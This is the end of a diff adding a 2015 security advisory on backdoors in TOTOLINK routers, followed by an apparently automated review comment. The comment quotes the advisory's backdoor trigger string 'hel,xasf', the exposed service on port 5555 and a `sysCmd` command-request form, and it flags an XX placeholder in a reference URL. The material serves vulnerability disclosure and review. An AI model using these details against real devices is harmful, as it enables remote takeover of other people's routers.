+(@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
+https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
\ No newline at end of file
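Review bot: "It does not affect devices using PPPoE connections" is broader than the page's own evidence supports: the text says skt "launch[es] a TCP daemon on port 5555 in every interface (including WAN)", so a PPPoE router still exposes the backdoor service on ppp0 and only the hard-coded `-i eth1` iptables rule fails to open port 80; suggest `The port-80 opening has no effect on PPPoE devices, but the 5555/tcp backdoor service is still reachable on the WAN`. The reference `https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html` still carries an XX date placeholder and will not resolve. The netcat examples (`nc 5555`) and the `sysCmd=&apply=Apply&msg=` requests appear to have lost their host and command placeholders in this rendering; the committed file should be checked. The detection probe is only an echo check, so any echo service on 5555 would match; a hit should be confirmed with `hel,xasf` followed by a probe of port 80 before a device is reported as backdoored.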